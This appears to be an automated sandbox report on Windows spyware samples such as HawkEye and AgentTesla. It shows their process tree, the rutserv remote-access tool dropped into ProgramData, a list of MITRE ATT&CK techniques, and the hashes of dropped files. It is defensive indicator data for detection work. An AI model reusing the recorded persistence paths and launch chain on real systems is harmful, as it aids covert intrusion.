  "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Spyware\HawkEye.exe"
  2⤵
  PID:3468
- C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Spyware\butterflyondesktop.exe
  "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Spyware\butterflyondesktop.exe"
  2⤵
  PID:1560
- - C:\Users\Admin\AppData\Local\Temp\is-A7SST.tmp\butterflyondesktop.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-A7SST.tmp\butterflyondesktop.tmp" /SL5="$1D03D6,2719719,54272,C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Spyware\butterflyondesktop.exe"
    3⤵
    PID:2532
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://freedesktopsoft.com/butterflyondesktoplike.html
      4⤵
      PID:3956
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3956 CREDAT:275457 /prefetch:2
        5⤵
        
        PID:4892
- C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Spyware\AgentTesla.exe
  "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Spyware\AgentTesla.exe"
  2⤵
  PID:2020

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:3916
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding DB5FFCBB9FF886C422DF4581A3F10127
  2⤵
  PID:1596

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
PID:3464
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe
  2⤵
  PID:4556
- - C:\ProgramData\Windows\rfusclient.exe
    C:\ProgramData\Windows\rfusclient.exe /tray
    3⤵
    PID:3736
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe /tray
  2⤵
  PID:3760

C:\Windows\system32\taskeng.exe
taskeng.exe {9BDE58E3-EC36-49B0-954D-A52C7974AE33} S-1-5-21-2812790648-3157963462-487717889-1000:JAFTUVRJ\Admin:Interactive:[1]
1⤵
PID:2856
- C:\Programdata\RealtekHD\taskhostw.exe
  C:\Programdata\RealtekHD\taskhostw.exe
  2⤵
  PID:848

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Intel\taskhost.exe

Filesize
3.6MB

MD5
c5ec8996fc800325262f5d066f5d61c9

SHA1
95f8e486960d1ddbec88be92ef71cb03a3643291

SHA256
892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db

SHA512
4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a

Download Submit
C:\ProgramData\Microsoft\Intel\wini.exe

Filesize
4.5MB

MD5
f9a9b17c831721033458d59bf69f45b6

SHA1
472313a8a15aca343cf669cfc61a9ae65279e06b

SHA256
9276d1bb2cd48fdf46161deaf7ad4b0dbcef9655d462584e104bd3f2a8c944ce

SHA512
653a5c77ada9c4b80b64ae5183bc43102b32db75272d84be9201150af7f80d96a96ab68042a17f68551f60a39053f529bee0ec527e20ab5c1d6c100a504feda8

Download Submit
C:\ProgramData\Windows\install.vbs

Filesize
140B

MD5
5e36713ab310d29f2bdd1c93f2f0cad2

SHA1
7e768cca6bce132e4e9132e8a00a1786e6351178

SHA256
cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931

SHA512
8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

Download Submit
C:\ProgramData\Windows\reg1.reg

Filesize
12KB

MD5
806734f8bff06b21e470515e314cfa0d

SHA1
d4ef2552f6e04620f7f3d05f156c64888c9c97ee

SHA256
7ae7e4c0155f559f3c31be25d9e129672a88b445af5847746fe0a9aab3e79544

SHA512
007a79f0023a792057b81483f7428956ab99896dd1c8053cac299de5834ac25da2f6f77b63f6c7d46c51ed7a91b8eccb1c082043028326bfa0bfcb47f2b0d207

Download Submit
C:\ProgramData\Windows\reg2.reg

Filesize
1KB

MD5
6a5d2192b8ad9e96a2736c8b0bdbd06e

SHA1
235a78495192fc33f13af3710d0fe44e86a771c9

SHA256
4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a

SHA512
411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d

Download Submit
C:\ProgramData\install\ink.exe

Filesize
112KB

MD5
ef3839826ed36f3a534d1d099665b909

SHA1
8afbee7836c8faf65da67a9d6dd901d44a8c55ca

SHA256
136590cb329a56375d6336b12878e18035412abf44c60bebdaa6c37840840040

SHA512
040c7f7b7a28b730c6b7d3fabc95671fe1510dac0427a49af127bdeb35c8643234730bf3824f627050e1532a0283895bd41fd8a0f5ac20a994accf81a27514f8

Download Submit
C:\Programdata\Windows\install.bat

Filesize
418B

MD5
db76c882184e8d2bac56865c8e88f8fd

SHA1
fc6324751da75b665f82a3ad0dcc36bf4b91dfac

SHA256
e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a

SHA512
da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
f760efac9e4326059cdc6495d7a2cb04

SHA1
9548fe5a424394ada1ee3415849c4fdb41635c94

SHA256
415da904cb979e1c0099075d5abdbf4120609c00d45d3408312f5653604f66f5

SHA512
a55383cd2c823814c571821b6ecc65fb17d831e16ab480a923d4486d94d1e7279c0dcdedc4b920fcaffdfcf220e021f25caa0fefeaee63fa56e2a968491d1953

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
881a0d8c575e350a9264d2dff17a677e

SHA1
8123c19d4004d852f4c3f6dffcc77cf91bcb8fe0

SHA256
a506aac70ad2f6fb8ed57c4f93ddbd349cf62758a359b0b60a37ecc677a1ff0d

SHA512
1f2b76c9418eaba6cff67171503a2b9aa465413e72972b536a841d1e42cc2d13e98af21607080332e0db2ad3fc864e61c600d323f5c2e155a5769488fb01191c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
a55a2d5c1609c8502e7bd4397abcab8d

SHA1
bdc72985225a5a08d8e2805701ac8c4a73b695ac

SHA256
b88bcb1ec72594237b72d10523927c99071b1bd1561a847cf6ccd7dcc712b993

SHA512
c713f7112dc601a88f8b5e17c3a83a8e761848bd755261270ac172661e97bc3c11f806354dcc0fa26c85f7116b3053cabd7c70b3fe75e4f75eeb299b0bbe2ded

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
5e283b3b4db7ce196b6920da50d804f8

SHA1
a96045f7a8638ad06cf73d0275eb5244abed0ab2

SHA256
6b7d94014f3d2753b1e1b6604a6595a70622a5a72bbaa7a7ed79051764b87020

SHA512
f826e33a9aa56d3deda702e7e6d9f1fc38ea108c1caeeb08ee767fd1e6642f325736937f6bb3c69587d7c5dfdf9deda228a741e4bafc4acfc4873d3f97035d3c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
237a39f76efbfff4bca6e6d7432be222

SHA1
c9bbf87297250142d56fd7f19a53454ed32ac9e7

SHA256
7e3529a72b2c5bff9fb8bba0e61ad301bcc692e7c94156c294c949ed42ed0dbf

SHA512
11b2bff697765faaa595fd9269723969bcd97d023eb7f043574e9399945318868dce52ff42f49df1e28b400a808199d3a0536ef4879e6a53c145dbd9fa58d490

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
d2bd7abadfb97104b826d765a611097d

SHA1
2e8a4384c4d1ba51235237f30341b5c3115c7814

SHA256
df2b615ea5d34441ea39cd1ff9803436003b33d747e766923c9c42847b7daa8e

SHA512
3a5c7d50235c3a002bef55ac719d63a9d43bd2aba62dd92c94826428c7945a4f527b3439f776f82705e41e2036d7cdd529076f12f26a946b9a62f785fcc07555

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
d83030adef86439b10ba4b241f5855d2

SHA1
b11db1e045097dfebce0eea4885e143e10535923

SHA256
98e0e6c9ec580eeb4cdb97a00b8e179e6ce80321386b6fd689e314594bfabc7e

SHA512
955c5b82ff844144f46663d380aad376f802597d15c9bd903bee5b551da5c453c097f6e0bcac429fac52fb135b4076f47bb7ef874c09a4d1fcc0130f23ad6adf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
0a0050c6dac1a5e0bab9b9a121aed49e

SHA1
afa9644b1908ed69d72d1d9404f55f6f5e6981f6

SHA256
830cf0fa79e4d3c918ea268df8c2ad1b9775025efa65c77d04a84342b6d2cafc

SHA512
4fe2e875941483f90e361ed58233c012176cfc87aadf3c51a1e4f0cbb985ad765e1834a266845212329e2db54f98c62dd36f83b238706205bcb4a59248f8fd02

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
9db40b0f4412e5cbde509f0095e7ea2d

SHA1
012a92edc9748df7211da0db4875b916bea6b4a0

SHA256
a15b286364339c9f6d4e311d092ba8c695ffdcc4a80ac84de268ef8734863e0a

SHA512
d6a95f3699401edc8fcc26e44fd12bad4abc6bb609f84f955107712883840d8ec7380778bbf1983f5f6342989fddd87caf68137a01d51a6de4d606962aecf5d7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
a4ce57356f916e9188f8543d7e021ddc

SHA1
17759ed041dcf4b191544cf12ef0fe8d9efe5682

SHA256
0e2ef1c04872cefb48a1c1c1282798ecd797d67a81e2f5fe1c3ac366c71f495e

SHA512
79660bad65aed482f67734de85a95ec19c5b6fba0f4897d72251dee53db7c6b8a9abda87b588bfaa6e2173c583306c5f6ce5126f8632b6d9a828276b9a1a2f61

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
2cf47371382f47673eceb84b20f5cbc3

SHA1
18151033590433ce889dd7cdf3c70249db19047a

SHA256
7e39249240ea234681433e1f51297ddfbc7bd165f050b3bbbc6eecd3b8e68b60

SHA512
3fb201121b29ad6e0e6917a843bf20386cf711cc3c68b6e437836967f487dabb08b5d33ee430012f5eb36c57ea526d5c90cea500787458a714bba222d0871c07

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
17e7bbe9aa81508f8da48baaf6c6d640

SHA1
ff4f6a26c7febbbb90533a5a0f8cd1b2d9307eb8

SHA256
cb70b6a07121cdaabf869b6f8176c151d8cee46443aad8f968ca8a6c140244b5

SHA512
eb8154606c60d2521db322d27358275a34e826fc6c1c1e8f765289edd5ecc8a18a7df56a995bdd5ac1cda52c615460f6a9bea6ec0a8bcc92cdcae6f25860df69

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
872a75aa09a6271158e2625b40ae1ead

SHA1
4d9426ff853b5466c71b56a86a7ccb0d47490ab3

SHA256
7265aa0e4860680034434bbf5f327de558b524d21f04a06390ccc61fa9de46b2

SHA512
effe1eaf118e8637ea168e2fd513b3668210c6c62be962d9a2267fc2d6a4a15bc21792e0c3e5982716d5d8b2c9a3317ea36eddb9a6bd867745fa720094b75ed5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
5d7dd03526f659ab1bfcf456b6fb70ef

SHA1
a923ef31721ec604384a313916f77a17041f08b8

SHA256
240390a2cfa40c83359100949198282068e973125839dceda58726efb421067e

SHA512
3d761aac3b0975459379c73e3c39278a2fbf2a61f6cd09ee1a5b6fa2608d04292502c750dba97bfd2b6b4e4ce7f911b29c847ba1ac5377a8722d267334f2aa1e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\49a5fb7e-1f2d-4d9e-9e51-93fb76e14958.tmp

Filesize
6KB

MD5
d939d3361df7a6e2c7c9dcd94c4ffb40

SHA1
6c78d87d4e6928effed5d69e94de6e04967c3008

SHA256
a03d480f3feb4de475ad1542b8e1446b53d47972e68732857fc6a0e030c2dba1

SHA512
583ed5894b58abd4b20aba8813123d8a1050f8a2d6a28332f30babb7c1a2bf4c4f31935c22cc13ec2fcf8312fc6b9c5ac123810ee029aecf86a3ef2ddc764d68

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

Filesize
16B

MD5
aefd77f47fb84fae5ea194496b44c67a

SHA1
dcfbb6a5b8d05662c4858664f81693bb7f803b82

SHA256
4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

SHA512
b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
813f179a424a3e7495937866205572ea

SHA1
c62bafa29fcecd983914a8c82a41bcfafecc5376

SHA256
9ca6c960020f7a60b6408a90cce03c91308eb83fa43237368bf88fbf90abab66

SHA512
47e41f77f483f41f88a12d2f55def808b0a3d595d4347ad11b451f6b305ddfd933bdc23bcb5f94357225321cbfa61afe4b92f22bc64012b8d9fcc47a76fdfeb4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
1a48f6360405f2ddacc91bb2eb83eefb

SHA1
fb1d7d233dc4933ef2fc65459f778f642e8b315b

SHA256
d2bb11b45053a64b2831bff187aef039c33697d8914330432ff9aedbd1daca8a

SHA512
99049e87ba3a938aee839dcdc158ddf507e7e1460b50f5173eb839cb564dc626730948e2bb5044a5eb8e365892a84af8788979e1f2ff6b80ea0493ff73c79e8b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
200B

MD5
c58f523a8e450bee390b0de6e3fbe53f

SHA1
c6954a70b2c995d0ac2828da6c2d7d900a59a41f

SHA256
a7ee467a0b8e153ada1ee684bb55f556442bdeaaeaec0c87188f3ee3657c4907

SHA512
48d76eb2579ae12165e9f80f1a0777d34e0b627c9d23b21ed4ce2b29e59ae525653c5e7eb4118477722050f77ae5e882504d196dadfa127ad48c295f4fa16af0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
67554573b63fddb7efb2e923b04982ee

SHA1
9e5e3bf1b2e3ced510ce9216bcd56486216c4267

SHA256
a554cf25ed8a45c0d2578d48f8507e7c5a16d59e711cdd31035d70e6aa3f8261

SHA512
4af84332a871799ae31b3da1a60542d03319584a301af18c9d813e4889cfa674a393249660aec2ac77bea4a01c718d990556880a0fb806c19e7d9e4e5ea391f3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
31ac6f39d2780d888eccf082b7e9be98

SHA1
1775fafbd33f808bf09df52c791d42fb2ebe32f4

SHA256
a2d3bdd588cc0f863bc76722f540e5f8f08e2dcfcc3252a8515bd1ba1cbc7f5b

SHA512
7db1683f99632b759910d712bad8052036df52d9f3d0eb640118ed0f8e1b965b279f41bc0bcd6586bea543b18f85b5d5a8b5de03f130c34a01db133143e461dc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
79cd1bcf251b7711ffc4cc7c0914071a

SHA1
19af5314e85392158b29dbe09863619ae29fa9d5

SHA256
25d8113bcd3907e0fe3af6de2c7ab2973c7a6f350c7787340dbf1319cb1fbf6c

SHA512
8be800ae5d317eb94a52718297051269a9256e1668b509281ac039c4b29542d2d754c7e5b10a73f8c8d34e24f8157c4957b676093290af6e0bd678536b84b984

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000007.dbtmp

Filesize
16B

MD5
18e723571b00fb1694a3bad6c78e4054

SHA1
afcc0ef32d46fe59e0483f9a3c891d3034d12f32

SHA256
8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

SHA512
43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

Filesize
235KB

MD5
c027e5de14243ccd31495f8060e32208

SHA1
1a393df2a0193e85e84548b0add17e13121cd683

SHA256
a88924bdbe2502937d8077d6287eedd53676022283b93cc68310be4c25e3fe6b

SHA512
0278d79bf28da68a0f136be350e6eb5bdf0ba99eb44d235dc7912a5e74616a5279420910ae854b18c77247ec4945240637650f97c2b39f573aad6f80fe4a3bc3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Outlook\mapisvc.inf

Filesize
1KB

MD5
48dd6cae43ce26b992c35799fcd76898

SHA1
8e600544df0250da7d634599ce6ee50da11c0355

SHA256
7bfe1f3691e2b4fb4d61fbf5e9f7782fbe49da1342dbd32201c2cc8e540dbd1a

SHA512
c1b9322c900f5be0ad166ddcfec9146918fb2589a17607d61490fd816602123f3af310a3e6d98a37d16000d4acbbcd599236f03c3c7f9376aeba7a489b329f31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\138D313B.wmf

Filesize
430B

MD5
5b57bc885c07ff0e962472458db6a934

SHA1
35c8ef82a8d80b070211d4807c591a1640f7895f

SHA256
1ac5b6c431be490d4047f44cc0fdb3ec11893c756b7aafe5a64d6b76e3630cf8

SHA512
c69f1aa48c22873774913f2dca620654dc9545787988e22ef34d1f9181cc23b4b667e8fa089b7d09da68082dfe452f844cb0f2821c7868b3461864be0452db07

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\21AAA8E5.wmf

Filesize
430B

MD5
d7690f3ec7790af224708fb449dbd80b

SHA1
16cd7d2cf598a60721abefb138bad426a79ecbcb

SHA256
71493cc357bb61fc6409e436ac86fe9cca3906ea77fe2c1aa8043cd85e133e8d

SHA512
b33ed13a4cfa7ef3f77c959d262af488d82e9e0f7b93a1c92314a9df264d2fcf201e4223fead9799f4727a5ff91067c953a5ec40f1811a483efcf2a9b964bd2c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3352D1A2.wmf

Filesize
430B

MD5
4781097fd7370ac4c26bfdf81aa5d3a2

SHA1
a4e29339dec3f80f6e74e8bfc65283e4e48deced

SHA256
4ad471f36dc814feade84ed363f4ed0adb7d9235e8aeeb0092031e0848dbe250

SHA512
e4989a6319590c95da8e6b6f01ae8f83b6237b2da2e96fcbc3a87908abb351ff4f383b134aa8cd47b0be03baa272f9bf8f766755e2ba4d48141e5b1923ac68b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3AD27F89.wmf

Filesize
430B

MD5
ad78b9b7cdefd0267115721c99edc535

SHA1
054e2fdc2a49dfa69406c14cd2a7950255535aeb

SHA256
5939164309fa08288500c791bd93eebd2c9bd50c09918b8d88509d0a2fb1d091

SHA512
b2dfeba5ae0fc01646159cce2da574f070c4122158459172cfe2e524491ef8b5d907bf91f79a4b646328f67c4f3c8ad3efa3f775b918f69aa675cb8611667265

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4BB5EF4C.wmf

Filesize
430B

MD5
e5ecc6b2740b17ef238934582ce0a29b

SHA1
803704a24d92c3afc9e65b54321733554a258d54

SHA256
a10a0bf729b66a9de5d1d31f3ff717c84354311459dfa43a683c32046d51ca9f

SHA512
1cf43238fe731e247aadd9935d076044e02972b96a03b8bc75e8fdf33f1f1842726c5ff439cc43e3abe855aae02d46b46e1e5dc38a173b825053d9603c9ae689

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4FE20FF6.wmf

Filesize
430B

MD5
8a6f25c831cba69a56979fc57e991deb

SHA1
1a58b7a36ca6ba99700c6e08d62a6dc4f601d800

SHA256
f3f1f60f5e51ff33d6a54e8b1571b40e8a556baaad9414ec155a84ada924234d

SHA512
0c92331dbc0e2a79fca98af7f645efe3500499b25f1cb1b52519c88dd9eff38c111ca3bab388e109a071a8863993078cd3e4ee8f9d3cdc02305e9efd9d9d3fa8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5B3EB80E.wmf

Filesize
430B

MD5
8e0701eb9c07813c049e2895ab659e31

SHA1
ebf560bcba130e36d45b67bee020121e43cbc34f

SHA256
cfe63f517489b32511822c275a96f478662660a6b369b863f2fb4375d786df46

SHA512
ace3b11adbd74414c88fda34ad71a6171d650f780b38509f9e2ba29c1a9ec809b0fa9a2b50ff8eba284ead7a4085e6728fa3d4984357ae5e5a3650ecc7defd23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91E25774.wmf

Filesize
430B

MD5
90c118abccebf6e9823aa0feac199fb8

SHA1
fb93a66a6714600f121637f2c5e8679ec39fe0ef

SHA256
3d2659e9d498aa50764f2d73ef832a2d594e4730588e10f452152b1e95da03bb

SHA512
9f0eb1dca53f88d0464ca146c950d210b33e0912ab0d5c692d26d907632c27eaa70b50809e79b2536a787fdcae2c0ea1bd054845bc083413d2cd73f213d6c058

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\98E2ECB7.wmf

Filesize
430B

MD5
ce48b5997bd88575d1c92bc3a2f5c494

SHA1
55f8b279dedbcc9b7fcc07894ac1d6da024eb1bb

SHA256
d6e074888cdda4b7821cb8761f6457c0e14040c897eb412efba18836960e0546

SHA512
ecd991c8fac5b3859688c92a132d860b326b1878ca712493e7e7533b031e4153d76bbac646e7bc115a02c2bcdbb4703e5ba5f2582f1e710c92fd558fddd44126

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AFDCD37F.wmf

Filesize
430B

MD5
68c2c85ceeb8ed2342b7f335264c47d1

SHA1
3f09020868e4fe802a1a79206fa6589fb2678f5d

SHA256
eb8d5956797be8fed5b12f9c2033de662392bd1462fd06631b5e5f95e3bd0368

SHA512
efe600946a1aac80e407b0ff19a31bf06f9f92114d9ab1b09408cc522d8339ccc78468c085185c853745cd6857d57480adb7b28f3e89f2e64d58860594d5be3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B7E81A01.wmf

Filesize
430B

MD5
489c487b94f84a5ed321b6e90834fc89

SHA1
bee4921a6680f7c1ab9c2464e56a574ae7458dfb

SHA256
bee50bd203a6563df5fe4916154a1025a488af5818f2691c311a5bbc03bb7bec

SHA512
fe24cdff257272aac88358f621654a3f0cb4a3836ac84c0218a0cd7dc3017fca37be38d3bc3f4b0a0abd02ec8cb9df8d9c337e71019a08f406869505a89fc37f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E8C0200.wmf

Filesize
430B

MD5
7562973d665d9b7d62dacc9196ca55c7

SHA1
631b2f4900339abff755aaed07745e7b5c79e381

SHA256
c31c700d03aea3872217454f4fbfb19c5e50b492fb8527b2e4a4423355f26391

SHA512
c4a78ce7a0981fa06ab821e02d34ff94ac80083ff62855090d22900a924507b1c9388e481f0f88beea543bb0107fba0cc27f2839cc6367a509b60d7b9cfb76f3

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7jts25bp.default-release\activity-stream.discovery_stream.json.tmp

Filesize
23KB

MD5
90bb0e1d6ebfdf26062e4bf48509ec6f

SHA1
d514c4b745c6cfd2973294a63332f175d7753bb2

SHA256
328f49f349bd456a85fc014bcd0cd0af7e46d33ccc51bbd93885dd550ed7352a

SHA512
12ca8c7a3841055aa6378ebcde1fc9bb12d3215a77c592027b9dbbadcc40f28b800bf6c5b522d54f939680abe81e45e3d0468bbc83bf6e93747bc59dda1b9e6e

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7jts25bp.default-release\activity-stream.discovery_stream.json.tmp

Filesize
23KB

MD5
a83e4117a48561b85d74c47a1a950811

SHA1
d6e2b84abaa6c24f6c5b24151488948e2218e553

SHA256
fba464793e792978a420e2e9e0989a60e767a09d2b92d686de81386c0a2f1781

SHA512
93a5cd361047576712ce208da1a97504349ba3c1c09c4d63613a42385ba567ca677124a6e7d366cde6159c9077a0272daea6bb3fb1ed7d92430e61195362a606

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7jts25bp.default-release\cache2\entries\46C625DB4964C00323A8EF4C60828B52A454EBB4

Filesize
666KB

MD5
3f5feb8f532a0fc190baf1cceabe09dc

SHA1
e3ac62d1a6b34b02f1a264f367c8e309f923272f

SHA256
2c8b71f8738589cfd0f61928808369f28bf8c773434f928d92c9949bda259068

SHA512
52133f6dac62835471244853de99e21432c6e605bafdcdda17af69067b9024e618fdd3d7c947ba3cd20bccca593acbcd451e6fba08c74a4630fdfb7eabc21c2a

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7jts25bp.default-release\cache2\entries\5AE6D89F9E02E65CE57A707F37A56F985F9BE4BA

Filesize
36KB

MD5
31f4b9d9beffe966bb7f50dc717bd9fe

SHA1
8e8462fb64467b47def39ee60ba18f204c5dd1a0

SHA256
239019f2cd381379d26fd19b51cd2662dc8199bd719ce4c9a3def4bc0bbe1305

SHA512
9fd02c1d2d6ef1c175bdab97575c47c3b90bdf3b16af8d2b1937f29fbc99a70ab3bb45f4530349ee98dc0b2a0c9be816420e9ee391b4d4d74c9bc5c4880db217

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7jts25bp.default-release\cache2\entries\80BB96996C8133B0FE5E0D6E5EA21B26135E8EA2

Filesize
60KB

MD5
2e47998d36c2fd5248828ede70327eec

SHA1
093d42bcc3a43c148df0c7119b3e91ebef682907

SHA256
439ee5f77296abc34a6dc3fcfb10bf85f56e150695416855da9d0c7339d920be

SHA512
3f0d7721575628135a85fdd641b5a81b0d3d7075ec2bfd38b9db0ee5ca5e2003c16ff337bb43913d2670260950003dedd3587a591b159739945b5f2bb03fc343

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7jts25bp.default-release\cache2\entries\971254C7341460E85C93D0821B91E9985A0B32D6

Filesize
1.2MB

MD5
92298ef7d08ad51a66d4ea196eb12d8a

SHA1
a4fb816a76e373f141fbd3cbf0553740d9bb0609

SHA256
de80113666ac9a12e459c1b266c37188d29524f9430e35edc201510fe65d0caf

SHA512
1e597612f5e6b6db86a544f31677c55c5b86a79d46acc0a8585c44395ccdb2c36d886abca521771a58bd7c8418366aadadde644f119db1543b8c2083229cd638

Download Submit
